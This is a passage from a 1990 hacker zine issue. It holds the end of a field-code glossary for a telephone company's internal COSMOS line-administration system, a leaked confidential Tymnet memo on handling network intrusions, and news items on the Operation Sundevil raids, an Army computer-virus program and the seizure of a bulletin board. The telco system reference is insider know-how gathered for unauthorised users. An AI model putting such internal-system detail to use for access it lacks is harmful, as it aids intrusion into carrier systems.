- ID=XXXX-XXXX-XX =1XB
- ID=XXX-XX-XX =5XB
- ID=XXXX-XXX =SXS
- ID=XXX-X-XX-X =DMS-10
- ID=XXX-X-XX-XX -DMS-100
- X=Alphanumeric
- MAT Manual Assistance Tag
- MAT XXX
- XXX=YES or NO
- MAX Maximum Percentage Value of Entity Fill or Maximum CCS Value
- MAX XXX
- XXX=Maximum of 3 Numeric Characters
- MBL Mini-bridge Lifter Tag
- MBL XX
- Y=MBL Working on CP
- N=CP Can't Support MBL
- EQ=CP has MBL Capabilities
- MC Marker Class of Service
- MC XX
- XX=Two Alphanumeric Characters
- MF Recent Change Message Format
- MF XXXX
- NEW=RX:LINE:messages
- OUT=RC:LINE:OUT:messages
- CHG=RC:LINE:CHG:messages
- SUSP=RC:LINE:CHG:messages of suspended service
- MF Jumper Listing for MDF
- MF XXX
- NEW=Running Jumper Listing
- DJ=Dead Jumper Listing
- MF Message Format When Completing Transfer Circuits with TOC
- MF XXX
- ALL=Message is Printed for Every Circuit in Range
- ERR=Message Printed Only for Circuits not Completed
- MF Message Format for Dial Transfer Number Lists
- MF XXX
- GVR=Transaction GFR Output Format, One Facility per Line
- LVT=Line Verification Test Format
- TLC=Two-line Condensed Format
- MG Marker Group Number
- MG X
- X=0-9
- MIN Minimum Percentage Value of Entity Fill or Minimum CCS Value
- MIN XXX
- XXX=Maximum of 3 Numeric Characters
- MLP Multi-loop Resistance Zone Threshold
- MLP XX
- XX=Two Numeric Characters
- MOD Module Number
- MOD XXX
- XXX=Three Numeric Characters
- MODE Integrated SLC No. 5ESS Mode
- MODE X
- 1=5 T1 Carrier Channels
- 2=3 T1 Carrier Channels
- MPN Master Work Package Number
- MPN XXXX
- XXXX=1-9999
- MR Message Register
- MR XXXXXX
- XXXXXX=Maximum of 6 Alphanumeric Characters
- MRO Message Register Option
- MRO XXX
- XXX=YES or NO
- MT Master Record Tape Unit Number or Tape Drive to Write
- MT X
- X=Numeric
- MTR Tape Drive to Read
- MTR X
- X=Numeric
- MTW Tape Drive to Write
- MTW X
- X=Numeric
- NAR NAC Assignment Review
- NAR XXX
- XXX=Maximum of 3 Numeric Characters
- NGF Number Group Frame for 5XB
- NGF XXX
- XXX=Three Numeric Characters
- NNX Telephone Exchange Code
- NNX XXX
- XXX=THree Numeric Characters
- NOE Number of OEs to be Assigned
- NOE X
- X=0 or 1
- NPA Area Code and Exchange Number
- NPA XXXXXX
- XXXXXX=Six Alphanumeric Characters
- NRM Normalizing CCS VAlue
- NRM XX
- XX=0-99
- NTN Number of TNs to be Assigned
- NTN X
- X=0 or 1
- OA Line Equipment Assignment Option
- OA X
- Y=Yes
- N=No
- OC Order Category
- OC XXX
- ACT=Assignment Change Ticket
- ALL=All OE Load Factors
- CPC=Special Service
- FM=Count Since OE Input Features Occurrences
- FO=Count All OE Input Feature Occurrences
- HOT=Frame Ouput-urgent
- JR=Jeopardy Reason
- OCS Old Class of Service
- OCS XXXXXX
- XXXXXX=Maximum of 6 Alphanumeric Characters
- OD Output Device
- OD XXXX
- TT=Send Output to Current Terminal
- TTXX=Send Output to Specified Terminal XX
- MTX=Send Output to Magnetic Tape X
- OE Office Equpiment Number
- OE ID
- (See MASK)
- OGO Outgoing Only Trunk
- OGO XXX
- XXX=Maximum of 4 Numeric Characters
- OPT Party Assignment Option
- OPT X
- 1=Assign Multi-party Customers to Spare Party Equipment
- 2=Assign Multi-party Customer to Partially Equipped Party Equipment
- 3=Assign Only One Multi-Party Customer to each Single Party Equipment
- ORD Service or Work Order
- ORD XX...XX
- XX...XX=Maximum of 20 Alphanumeric Characters
- OT Service or Work Order Type
- OT XXX
- BT=Background Transfer
- CD=Complete Disconnect
- CH=Changed
- CIO=Company Initiated Orders
- F="FROM"
- LET=Line Equipment Transfers
- LST=Line and Station Transfers
- MCE=Maintenance Change by LAC
- MCR=Maintenance Change by Repair
- MCT=All Maintenance Changes
- NC=New Connect
- R=Remarks
- REA=Pending Reassociation
- SW=Swap
- T="TO"
- PBX Private Branch Exchange
- PBX XXXX
- XXXX=Maximum of 4 Numeric Characters
- PCID Primary Circuit Identification
- PCID XX...XX
- XX...XX=Maximum of 61 Alphanumeric Characters
- PKT Picket Fence Values
- PKT XXX.X,...,XXX.X
- XXX.X,...,XXX.X=Nine sets of Four Numeric Characters or
- N=No New Values
- PL Private line Circuit Number
- PL XX...XX
- XX...XX=Maximum of 61 Alphanumeric Characters
- PNL PREMIS Number List for TN
- PNL XX...XX
- XX...XX=Maximum of 12 Alphanumeric Characters
- POP Line Equipment Print Option
- POP XXX
- CNC=Concentrator-1ESS, 2ESS, 3ESS, RSS
- CNG=Concentrator Group-2ESS, 3ESS
- HG=Horizontal Group-5XBAR
- IM=Interface Module-5ESS
- LFG=Line Finder Group-SXS
- LLF=Line Link Frame-5XBAR
- LLN=Line Link Net-1ESS
- LTN=Line Trunk Net-2ESS
- LU=Link Unit Module-5ESS
- QC=Quarter Choice-1XBAR
- SW=Switch-1XBAR
- VF=Vertical FIle-5XBAR
- PR Cable Pair ID
- PR YXXX
- Y=Alphanumeric
- XXX=Numeric
- PRI Frame Priority
- PRI XX
- XX=Two Numeric Characters
- PRP Permanent Cable Pair Remarks
- PRP XX...XX
- XX...XX=Maximum of 14 Alphanumeric Characters
- PRZ Preferred Rate Zone
- PRT X
- X=Numeric
- PS Previously Published/Non-published Facility Indicator
- PS X
- N=Non-Published
- !=Published
- PT Package Time
- PT XXX
- XXX=Three Numeric Characters
- PTY Party Number or Position
- PTY X
- X=1-4
- PTY Party Indicator
- PTY X
- R=Reserved
- O=Open
- PWC PREMIS Wire Center
- PWC XX...XX
- XX...XX=Maximum of 8 Alphanumeric Characters
- PWC Print Work Code
- PWC XXX
- NBT=No Back Tap
- COM=Frame Complete
- PBT=Print Back Tap
- RCT=Place Heat Coils on "TO" Pair
- RBT=Remove Back Tap
- RCF=Remove Heat Coils on "FROM" Pair
- VBT=Verify Back Tap
- USX=Locally Defined Codes (X=1-4)
- RAP Rotary Assignment Priority
- RAP X
- X=Numeric
- RCT Recent Change Type
- RCT XX
- 1=1ESS Office
- 1A=1AESS Office
- 2=2ESS (LO1)
- 2E=2ESS (EF1 and EF2)
- 3=3ESS
- 5T=5ESS
- RCW Recent Change Keyword
- RCW XX...XX
- XX...XX=Maximum of 20 Alphanumeric Characters
- RD Release Date
- RD MM-DD-YY
- MM=Month
- DD=Day
- YY=Year
- RDG Message Register Reading
- RDG XXXX
- XXXX=Four Numeric Characters
- REC Record File Name and Number
- REC FFXXXXXX
- FF=File Name (Alphanumeric)
- XXXXXX=Record Number (Maximum of 6 Numeric Characters)
- REP Reprint Option
- REP X
- Y=Yes
- N=No
- RESP Send a Solicited Response
- RESP X
- S=Solicited Response
- REW Rework Status
- REW X
- Y=Yes
- N=No
- RLF Re-using DIPs Upper Bound Load Factor
- RLF X
- X=1-9
- RLO Automatic Relay Assignment Present
- RLO X
- Y=Yes
- N=No
- RLY Miscellaneous Relay
- RLY XX...XX
- XX...XX=Maximum of 10 Alphanumeric Characters
- RMK Remarks on Orders
- RMK XX...XX
- XX...XX=Maximum of 28 Alphanumeric Characters
- RMKG Hunt Group Remarks
- RMKG XX...XX
- XX...XX=Maximum of 30 Alphanumeric Characters
- RMKO Remarks on Office Equipment
- RMKO XX...XX
- XX...XX=Maximum of 12 Alphanumeric Characters
- RMKP Remarks on Cable Pair
- RMKP XX...XX
- XX...XX=Maximum of 14 Alphanumeric Characters
- RMKT Remarks on Telephone Number
- RMKT XX...XX
- XX...XX=Maximum of 14 Alphanumeric Characters
- RNO RSS Subentity Number
- RNO XX
- XX=01-63
- RTI Route Index
- RTI XXXX
- XXXX=Maximum of 4 Numeric Characters
- RTYP Relay Type
- RTYP XXX
- TBA=Tens Block Auxiliary
- SC=Sleeve Connect
- AR=Advance
- RTZ Rate Zone
- RTZ X
- X=Numeric
- RW Recent Change Work
- RW X
- N=Recent Change Message not Required
- C=Recent Change Coordination Required
- RZ Resistance Zone
- RZ XX
- XX=Two Numeric Characters
- SBS Sub-status
- SBS X
- A=Area Transfer
- C=Cut Through
- D=Dedicated
- L=Cut Through and Dedicated
- !=Blank
- SC Sleeve Connect Relay
- SC SYY-ZZZ
- S=Marker Group (Numeric)
- YY=Number Group Frame (Numeric)
- ZZZ=Relay Number (Numeric)
- SE Special Service Equipment Number
- SE XX...XX
- XX...XX=Maximum of 52 Alphanumeric Characters
- SET Single Entity Tag
- SET X
- Y=CP is Served by a Single Entity on a Single Frame
- !=CP Can be Served by More Than One Entity
- SG Service Segment
- SG X
- B=Business
- C=Coin
- D=Data
- R=Residence
- S=Special
- SGN Common Language Segment Number
- SGN XXX
- XXX=Maximum of 3 Alphanumeric Characters
- SIS Special Identifying Telephone Number Supplement
- SIS XXXX
- XXXX=Maximum of 4 Numeric Characters
- SIT Special Identifying Telephone Number
- SIT XXX-YYY-XXXX
- X=Numeric
- Y=Numeric
- SK Skip Option
- SK X
- X=0 or 2-9
- SN Sequence Number
- SN XXX
- XXX=1-999
- SOB Service Observing Tag
- SOB XXX
- XXX=YES or NO
- SS Suspension Status
- SS XX
- DB=Deny Both Ways
- DI=Deny Incoming
- DO=Deny Outgoing
- RS=Restore Suspended Circuit
- SB=Suspend Both Ways
- SD=Season Disconnect
- SI=Suspend Incoming
- SO=Suspend Outgoing
- DX=Deny Toll Access Tervice
- SSV Suspend Service Type
- SSV XX
- DO=Deny Outward Service
- DB=Deny Both Outward and Inward Service
- DX=Deny Toll Access Service
- RS=Restore Denied Service
- STAT Order Status
- STAT XX
- AC=Pending With no Framd or Installation Completion
- FC=Pending With Frame Completion but no Installation Completion
- IC=Pending with Installation Complation but no Frame Completion
- CC=Completed Orders
- CA=Canceled Orders
- STAT Facility Status
- STAT XX
- AS=All Spare
- EX=Excluded
- PC=Pending Connect
- RS=Reserved
- SF=Spare Facility
- UK=Unknown
- WK=Working
- STAT Load Group Status
- STAT XX
- EX=Blocked from all Assignments
- FU=Open for Dial Transfer Assignments Only
- PS=Pseudo LEN Assignments Only
- SO=Open for Service Orders and Work Orders Only
- WK=Open for All Assignments
- STO Line Equipment Status
- STO XX
- AW=All Working
- MS=Miscellaneous
- OF=Official
- TJ=Trunk and Junctor
- TS=Test
- WK=Working
- PD=Pending Disconnect
- PK Pending Disconnect/Pending New Connect
- AS=All Spare
- EX=Excluded
- LI=Left-in Disconnect
- RS=Reserved
- SF=Spare
- UK=Unknown
- PC=Pending Connect
- STP Cable and Pair Status
- STP XX
- AL=All Pairs
- AD=All Defective
- AP=All Provisioned
- AW=All Working
- DC=Designed Circuit
- DI=Defective (I=1-9)
- DM=Designed + SSM
- DP=Designed + SSP
- SM=Special Safeguard Measures
- SP=Special Safeguard Protection
- SS=Special Status
- WK=Working
- AS=All Spare
- EX=Excluded
- LI=Left-in Disconnect
- RS=Reserved
- SF=Spare
- UK=Unknown
- PC=Pending Connect
- PD=Pending Disconnect
- STT Telephone Number Status
- STT XX
- AU=Auxiliary
- AW=All Working
- MS=Miscellaneous
- NP=Non-published
- OF=Official
- TJ=Trunk and Junctor
- TS=Test
- WK=Working
- AS=All Spare
- AV=Available
- CM=Changed-Machine Intercept
- CO=Changed-Operator Intercept
- DM=Disconnected-Machine Intercept
- DO=Disconnected-Operator Intercept
- EX=Excluded
- RS=Reserved
- SF=Spare
- UK=Unknown
- PC=Pending Connect
- PD=Pending Disconnect
- PK=Pending Disconnect/Pending New Connect
- SUBL Sublet Service
- SUBL XXX-XXXX
- XXX-XXXX=Telephone Number
- SWC Set Work Code
- SWC XXX
- (See Print Work Code)
- SWG Switch Group
- SWG X
- X=0-2
- SYS Machine Number
- SYS XX...XX
- XX...XX=Maximum of 12 Alphanumeric Characters
- TA Transfer Assembly
- TA X
- Y=Yes
- N=No
- TAP Touchtone Assignment Priority Number
- TAP X
- X=Numeric
- TBA TBA Relay
- TBA XYY-ZZZ
- X=Marker Group Number (Numeric)
- YY=Number Group Frame (Numeric)
- ZZZ=Relay Number (Numeric)
- TBS TBS Relay
- TBS XZ-NN
- X=Marker Group Number (0-9)
- Z=Relay Number (0-3)
- NN=Ringing Combination (01-16)
- TC TO Cable
- TX XX...XX
- XX...XX=Maximum of 10 Alphanumeric Characters
- TER Terminal
- TER XXXX
- XXXX=Maximum of 4 Numeric Characters
- TER Terminal Number
- TER Y-XXXX-ZZZZ
- Y=Control Group (Alphanumeric)
- XXXX=Group Number (Numeric)
- ZZZZ=Terminal Number (Numeric)
- THG Thousands Group
- THG X or
- THG XXXX
- X=0-9
- XXXX=0000,1000,...,9000
- TK Trunk Cable and Pair Number
- TK YYYYYY-XXXX
- YYYYYY=Cable ID (Maximum of 6 Alphanumeric Characters)
- XXXX=Cable Pair ID (Maximum of 4 Numeric Characters)
- TLI Telephone Line Identifier
- TLI XXX-YYY-XXXX
- X=Numeric
- Y=Alphanumeric
- TN Telephone Number
- TN XXX-XXXX
- XXX-XXXX=Telephone Number
- TOM Two or More Non-pending, Non-party Filtered Circuit Facilities
- TOM XX
- CP=Cable Pair
- TN=Telephone Number
- OE=Office Equipment
- TP Tie Pair
- TP YY...YY-XXXX
- YY...YY=Cable ID (Maximum of 10 Alphanumeric Characters)
- XXXX=Tie Pair ID (Maximum of 4 Numeric Characters)
- TPR Taper Code
- TPR XXXXXX
- XXXXXX=Maximum of 6 Alphanumeric Characters
- TRE Transmission Equipment
- TRE XX...XX
- XX...XX=Maximum of 17 Alphanumeric Characters
- TT Telephone Number Type
- TT X
- B=POTs Hunting
- C=Coin
- G=Complex Service (Direct Inward Dialing, Radio Common Carrier, etc)
- O=Official
- Q=Centrex
- X=POTx Non-hunting
- TTA Terminating Traffic Area
- TTA XXX
- XXX=Maximum of 3 Alphanumeric Characters
- TYP Switching Type
- TYP XXX
- 1ES=Number 1ESS
- 2ES=Number 2ESS
- 3ES=Number 3ESS
- 5ES=Number 5ESS
- RSS=Remote Switching System
- 1XB=Number 1 Cross-bar
- 5XB=Number 5 Cross-bar
- SXS=Step-by-step
- DMX=DMS-10
- DMC=DMS-100
- US USOC
- US XXXXX
- XXXXX=Maximum of 5 Alphanumeric Characters
- USE Entity Usage
- USE X
- G=Growth
- S=Stable
- VAL Minimum Valid Hours for Entity Data
- VAL XX
- XX=1-99
- WC Wire Center
- WC XX
- XX=Alphanumeric
- WL Work Location
- WL Y
- Y=1-8 or
- WL XXX
- ADM=Administrative
- ACT=Assignment Change Ticket
- CPC=Special Service Circuits
- MCT=Maintenance Change Tickets
- WPN Work Package Number
- WPN XXXX
- XXXX=1-9999
- WPT Work Package Type
- WPT XXX
- XXX=Maximum of 3 Alphanumeric Characters
- XN "X" Number
- XN XXX-YYXX or
- XN XXX-YXX
- X=Numeric
- Y=Alphanumeric
- ZN Zone Location
- ZN XXX
- XXX=001-999
- =============================================================================
- ACKNOWLEDGEMENTS
- Skinny Puppy for refreshing my memory
- The Urvile for the "$*" file and further usage of echo
- Bell Laboratories OPA-1Y600-01
-
- _______________________________________________________________________________
- ==Phrack Inc.==
- Volume Three, Issue Thirty-one, Phile #7 of 10
- COMPANY CONFIDENTIAL
- INTERIM MEMORANDUM
-
- SUBJECT: TYMNET SUPPORT FOR CUSTOMER'S DATA SECURITY
- PURPOSE: This document provides background, and general procedures
- and practices used to support customers with suspected security
- problems. Field Sales is the intended audience but is a general
- document and may be useful to other customer support personnel.
- Currently, this document is in a final review. Meanwhile, it is to
- retain the status of an internal proprietary document.
- BACKGROUND: BT Tymnet Inc, and its Network Systems Company,
- believe information integrity is vital to ourselves and our
- customers. One way TYMNET insures integrity is by providing good
- security. TYMNET has a baseline security of user name, password,
- and user access profile available for all customers. Further, there
- are two security products. One permits the customer to limit
- password life (password automatically expires after a customer
- elected time period) and the other permits the end user to change
- his/her own password. Since we do consider security a key issue,
- we continue to develop other security features. Also, we work with
- Security vendors to certify their security products on our network,
- thus permitting customers to add such products, should they so
- desire.
- We have established Network Systems Company Policies which provide
- a framework for the information contained herein (see NSC Policy
- 121 and 122. More policies are in distribution as of this
- writing). It is highly recommended that these policies be reviewed
- since they represent the framework of this document.
- Legal considerations are another key issue in any security case.
- Support, other then providing the customer with related security
- data, can only occur if law(s) have been broken. The
- legal issues are complex and only a minimal information is
- provided herein. At at the heart of this issue is the fact that
- the customer is the injured party, not TYMNET. Patience and good
- communication may be required to get the customer to understand
- this fact. The customers must act for themselves to obtain
- law enforcement support. TYMNET will support that activity, and
- help to the degree possible, much as a "friend of the court".
- THE SUPPORT: We provide security support as a responsible
- network service provider. The first step in that support is for
- the field sales representative to act as a security consultant to
- the customer, at least to the extent explained below.
- The customer is well advised to plan in advance "what to do
- when Captain Midnight strikes" -- contingency planning, pure
- simple. First there are two basic alternatives to choose from:
- PROTECT AND PROCEED
- OR
- PURSUE AND PROSECUTE
- "Protect and proceed" means 1) determine how the incident
- occurred, 2) plug the security leak/hole, and 3) go on with
- business as normal.
- (Do we want written notification of the Intent to "Pusue and
- Prosecute" from the "Injured Party?").
- "Pursue and prosecute" is just that. The first step is having
- the customer obtain legal support, and both we and the customer
- continue to gather evidence until the suspect is apprehended. The
- next step is the prosecution in a court of law. (The final step is
- to return to the first alternative, e.g., now protect and
- proceed.)
- The customer needs to judge each case on its own merits, but
- generally the first choice is the wiser one. The second choice
- involves considerable effort, mostly by the customer and law
- enforcement agency(s), possible negative publicity for the
- customer and does not necessarily result in successful prosecution.
- Good contingency planning also includes becoming familiar with the
- laws and the local law enforcement people.
- The starting point is a suspected incident. Herein, we will address
- the case where the customer has identified a suspected intruder.
- Generally, that occurs by a customer's detailed review of billing
- or host based security exception reports.
- At this point it is essential the field sales representative open a
- ticket containing at least the following: 1) customer name and CID,
- 2) host(s) involved, 3) incident start and stop times, and 4) the
- customer's objective. Add any other information deemed helpful.
- Other support may be an on-line trace of the call, if the
- suspect is currently on-line. Field support should do this trace, or
- alternately, this same help can be obtained by calling network
- customer support and/or NetCon. In any case it must be done while
- the suspect is on-line. Such trace information should be
- included on the ticket.
- Based on the customer's position; the case will fit either
- "prevent and proceed" or, "pursue and prosecute". The former is
- straight forward, in that TYMNET security will research the
- incidents(s), and provide data (generally user name and point of
- origin(s) to the customer via Field Sales, with recommendations
- on how to prevent any further occurrence. We do provide this
- service as a responsible vendor, although strict interpretation
- of NSC policy 121 precludes it. However, we do apply the policy if
- a customer continues to ask for data without taking preventative
- action.
- The "pursue and prosecute" case is complex, and is different for each
- situation. It will be explained by using a typical scenario. After
- the first step (as above), it is necessary to gather data sufficient
- to show a pattern of intrusion from a single TYMNET access point.
- With this information, the customer (the injured party) must contacts
- law enforcement agency(s), with the one exception noted below.
- If that intrusion point is through a gateway from a foreign
- country, for all practical purposes, the customer can do little to
- prosecute. The law(s) of the foreign country will apply since
- extradition is most unlikely. Therefore, action will have to be
- have to be initiated by the network service provider in the
- foreign country. In this case, TYMNET security will have MIS
- research the session details to obtain the Network User
- Identifier, and External Network Support (Jeff Oliveto's
- organization) will communicate that information to the foreign
- network for their action (cases involving U.S. government computers
- may get special treatment - see for example - Communications of the
- ACM, May, 1988, article on "Stalking the Wiley Hacker").
- Most all security incidents on our network are caused by international
- hackers using X.121 addressing. Frequently, our customer is unaware
- of the risk of X.121 addressing, and permits it. BE SURE YOUR
- CUSTOMERS KNOW THAT THEY CAN CHOOSE FULL TYMNET SECURITY FEATURES,
- THEREBY PRECLUDING SUCH INTRUSIONS FROM X.121 ADDRESSING FROM
- FOREIGN NETWORKS.
- For the domestic case, the customer gets law enforcement (attorney
- general at incoming call location, secret service if credit card
- fraud is involved, or possibly the FBI, depending on the incident)
- to open a case. Note, damage in estimated dollars is usually
- necessary to open a case, and many agencies will not take action on
- small claims. For example, as of December, 1988, the Los Angeles
- Attorney will not open a case for less than $10,000 (they have too
- big a caseload at higher damages).
- Assuming legal support is provided, a court order for a wire tap
- and trace will be obtained, thereby determining the caller's phone
- number (this step can be very involved and time consuming for long
- distance calls). The next legal action occurs after the calling
- number is identified. A search warrant is obtained for searching the
- facility housing the phone location. Normally, this search will
- gather evidence sufficient for prosecution. Evidence is typically
- the necessary terminal equipment, printouts, diskettes, etc. Then,
- at long last the prosecution. Also note, again at the time the
- calling number is identified, the injured party should use the
- "protect and proceed" plan.
- For further information, contact Data Security, TYMNET Validations,
- or Ontyme NSC.SECURITY.
-
- _______________________________________________________________________________
- ==Phrack Inc.==
- Volume Three, Issue Thirty-one, Phile #8 or 10
- PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
- PWN Phrack World News PWN
- PWN Issue XXXI, Part One PWN
- PWN Compiled by Phreak_Accident PWN
- PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
-
-
- Operation "Sun-Devil"
- =====================
- May 9th and 10th brought on two day thats would be marked in every hackers
- history book. The reason we assume these days will be important to many, is
- that maybe it's time we opened are eyes and saw the witch hunt currently in
- progress.
- In less than 48 hours, 150 Secret Service men and other law officials
- served 30 search warrents in 14 cities around the nation (This thing was hudge).
- Operation "Sun-Devil" (As the Attorney General in Phoenix called it), was
- a success on their part. "The investigation though is not over, and there are
- more warrents to be executed.", said Jim Folwer of L.A's Secret Service.
- Any details of the investigation are not being given out at this time.
- The Asst. Attorney General of Pheonix told Phrack Inc. that there were other
- problems involving the investigation and that it was an ongoing investigation
- for the last TWO years.
- It is my understanding that Gail Thackeray and the Secret Service are not,
- taking this lightly. She told Phrack inc. that they are not distinquishing
- pirates, hackers, or phreakers. Basically, it's any kid with a modem that calls
- a BBS with an alias. Yes, we are the witches, and we are being
- hunted.
- The following are Two news releases obtianed via fax through the U.S.
- Secret Service for Phrack Inc.
-
- N E W S R E L E A S E
- FOR IMMEDIATE RELEASE CONTACT: Gail Thackeray
- ------------------------ Assitant Attorney General
- May 9, 1990 @ 11:00 A.M. (602) 542-4266
-
- Attorney General Bob Corbin announced today that in
- connection with an eighteen-month joint investigation into
- computer crime conducted with the United States Secret
- Service and the United States Attorney's office, the Arizona
- Attorney General's office has executed seven search warrants
- in which computers, electronic bulletin boards, telephone
- test equipment and records have been seized.
- The Organized Crime and Racketeering Division
- investigation involved complaints by Arizona and out of state
- victims of substantial financial losses resulting from credit
- card fraud and theft of long distance telephone and data
- communications services, and by victims of attacks on
- computer systems operated by government agencies, private
- corporations, telephone companies, financial institutions,
- credit bureaus, and a hospital.
- The Arizona Attorney General's office received
- information and technical assistance from the Glendale,
- Arizona Police Department's Computer Crime Unit, and from
- many private sector sources, including Bellcore (Bell
- Communications Research), American Express, Communications
- carriers U.S. Sprint, AT&T, MCI, Com Systems, MidAmerican
- Communications, LDL Communications, and Shared Use Network.
- Without the cooperation of these companies and of numerous
- federal, state and local law enforcement agencies around the
- country, this investigation would have been impossible.
- The privacy of our citizens and the health of our
- economy depend upon secure, reliable computer systems.
- Computer fraud and attempts to compromise senstitive public
- and private computer systems will not be tolerated.
- Individuals who commit these offenses in Arizona can expect
- to be prosecuted.
-
- .end.
- P R E S S R E L E A S E
- FOR IMMEDIATE RELEASE Contact: Wendy Harnagel
- Wednesday, May 9, 1990 United States Attorney's Office
- ---------------------- (602) 379-3011
- PHOENIX -- Stephen M. McNamee, United States Attorney
- District of Arizona, Robert K. Corbin, Attorney General for
- the State of Arizona, and Henry R. Potosky, Acting Special
- Agent in Charge of the United States Secret Service Office in
- Phoenix, today announced that approximately twenty-seven
- search warrants were executed on Monday and Tuesday, May 7
- and 8, 1990, in various cities across the nation by 150
- Secret Service agents along with state and local law
- enforcement officials. The warrants were issued as a part of
- Operation Sundevil, which was a two year investigation into
- alleged illegal computer hacking activities.
- The United States Secret Service, in cooperation with
- the United States Attorney's Office, and the Attorney General
- for the State of Arizona, established an operation utilizing
- sophisticated investigative techniques, targeting computer
- hackers who were alleged to have trafficked in and abuse
- stolen credit card numbers, unauthorized long distance
- dialing codes, and who conduct unauthorized access and damage
- to computers. While the total amount of losses cannot be
- calculated at this time, it is estimated that the losses may
- run into the millions of dollars. For example, the
- unauthorized accessing of long distance telephone credit
- cards have resulted in uncollectible charges. The same is
- true of the use of stolen credit card numbers. Individuals
- are able to utilize the charge accounts to purchase items for
- which no payment is made.
- Federal search warrants were executed in the following
- cities:
-
- Chicago, IL
- Cincinatti, OH
- Detroit, MI
- Los Angeles, CA
- Miami, FL
- Newark, NJ
- New York, NY
- Phoenix, AZ
- Pittsburgh, PA
- Plano, TX
- Richmond, VA
- San Diego, CA
- San Jose, CA
- Unlawful computer hacking imperils the health and
- welfare of individuals, corporations and government agencies
- in the United States who rely on computers and telephones to
- communicate.
- Technical and expert assistance was provided to the
- United States Secret Service by telecommunication companies
- including Pac Bel, AT&T, Bellcore, Bell South, MCI, U.S.
- Sprint, Mid-American, Southwestern Bell, NYNEX, U.S. West,
- and by the many corporate victims. All are to be commended
- for their efforts for their efforts in researching intrusions
- and documenting losses.
- McNamee and Corbin expressed concern that the improper
- and alleged illegal use of computers may become the White
- Collar crime of the 1990's. McNamee and Corbin reiterated
- that the state and federal government will vigorously pursue
- criminal violations of statutes under their jurisdiction.
- Three individuals were arrested yesterday in other
- jurisdictions on collateral or independent state charges.
- The investigations surrounding the activities of Operation
- Sundevil are continuing.
- The investigations are being conducted by agents of the
- United States Secret Service and Assistant United States
- Attoryney Tim Holtzen, District of Arizona, and Assistant
- Arizona Attorney General Gail Thackery.
-
- .end.
- _______________________________________________________________________________
- Virus mania
- ===========
- Robert T. Morris started it all. Who cares, it's over and done with.
- Never the less, it's being dragged out in every national paper. It's old news
- so we won't cover it here, but we will tell you about something the Army has up
- its sleeve.
- Army is Looking for a Few Good Viruses
- By Rory J. O'conner
- Knight-Ridder Newspapers
- ______________________________________
- The U.S. Army is looking for help to develop the seeds of a new-age germ
- warfare: It wants business to help it turn computer "viruses" into military
- weapons.
- Experts predict the viruses, if sucessfully developed, could be used to
- wreak havoc on the increasing number of computers in the battlefield. The
- destructive computer programs which have increasingly damaged commercial and
- research computer systems in the past four years, could be used to disrupt
- military communications and feed misleading data to enemy commanders.
- The viruses could aslo be used to alter the programming of crucial
- communications satellites serving combat units, the experts said.
- The Army is soliciting bids from small businesses to determine the
- feasibility of using computer viruses in warefare. And it is willing to pay up
- to $550,000 to a company that comes up with a plan for creating the programs -
- and figures out how to use military radio systems to introduce them into enemy
- computers.
- A computer virus is a kind of program designed to disrupt normal operation
- of a computer system or damage data ont hat system by altering or destroying
- it. The rogue programs are most effective when introduced secretly into the
- computer system of an unsuspecting user and when their damage is subtle or
- hidden fromt he user for some time.
- Viruses are also self-duplicating and can spread undetected from an
- infected computer to other computer systems they contact.
- So far, more than 60 computer viruses have been identified, most of them
- attacking poorly guarded personal computers used by businesses, universities
- and inividuals. The Army's virus would have to be more sophisticated than
- those programs.
- But some detractors of the concept say the Army could wind up with the
- same problem it has with biological weapons: Creating destructive elements
- that might get loose and cause widespread damage to its own forces as well as
- civilians.
- "This stuff is very dangerous, and most people involved in creating
- viruses are not aware of the threat," said a Bay Area virus expert who asked ot
- to be named. "You can't spread anthrax around the world and not have it come
- back around to you. And the enemy is using the same kind of computers and
- software that we are."
- Many experts who are fighting the explosion in virus activity by amateur
- programmers are especially angry at government efforts to develop the programs
- for the military. Some say it is particulary troubling in light of the
- sentencing of Robert T. Morris Jr. (Ed -Ick), convicted in federal court of
- sending a similar program through a government sponsored network in 1988.
- "It bothers me that the government says in one breath (viruses) are bad
- and illegal and then asks for someone to develop them," said Glenn Tenney, a
- San Mateco, Calif., programmer and organizer of the annual Computer Hackers
- Conference. "If Morris had done the same thing for the Army, they'd have paid
- him hundreds of thousands to do it. But he did it on the wrong side and got
- punished."
- Computer experts say creating a virus to the Army's specifications is
- possible with current technology - although some of the Army's requirements
- could make developing it more difficult than creating an ordinary personal
- computer virus.
- First, military computer systems are usually designed with far more
- security features than commercial systems, making it much harder for a virus to
- enter the systems. Second, the Army is emphasizings the use of radio
- communication to inject the virus into enemy systems. Normally, computer
- viruses spread through the exchange of floppy disks that contain the rogue
- program or along wires connecting several computers. Using complex military
- radio signals instead would require expertise that mose programmers don't have.
- .end
- _______________________________________________________________________________
- RIPCO May 8th, 1990
- ----- -------------
- Operation Sun-Devil claimed more than just a few "Codelords" around the
- states, it claimed one of the oldest and more popular boards. Nobody knows
- when or if RIPCO shall return.
- Reportedly, Dr. Ripco was charge on a hand-gun violation after his house
- was searched. Phrack inc. can't comment on this.
- The following is the exact transcript of the message left on RIPCO's
- answering maching after Operation Sun-Devil.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- This is 528-5020.
- As you are probably aware, on May 8, the Secret Service conducted a series
- of raids across the country. Early news reports indicate these raids
- involved people and computers that could be connected with credit card and
- long distance toll fraud. Although no arrests or charges were made, Ripco
- BBS was confiscated on that morning. It's involvement at this time is
- unknown. Since it is unlikely that the system will ever return, I'd just l
- say goodbye, and thanks for your support for the last six and a half years.
- It's been interesting, to say the least.
- Talk to ya later.
- {Dr. Ricpo}
- *** END OF VOICE MESSAGE ***
- _______________________________________________________________________________
-
- ==Phrack Inc.==
- Volume Three, Issue Thirty-one, Phile #9 of 10
- PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
- PWN Phrack World News PWN
- PWN Issue XXXI, Part Two PWN
- PWN Compiled by Phreak_Accident PWN
- PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
-
-
- {C}omputer {E}mergency {R}esponse {T}eam
- ----------------------------------------
- Some call it "Internet Police" -- Others call it "just stupid."
- CERT however is a mix. But I do give them credit -- After all, have your
- number one goal being 'making the Internet more secure' has to be a tough task.
- Therefore, we give them credit.
- However, CERT is funded by DARPA, which is a government agency. And
- anything in my book that the government runs is bad news. Yes, the government
- pays the 6 man salary and keep their hot-line active 24 hours a day.
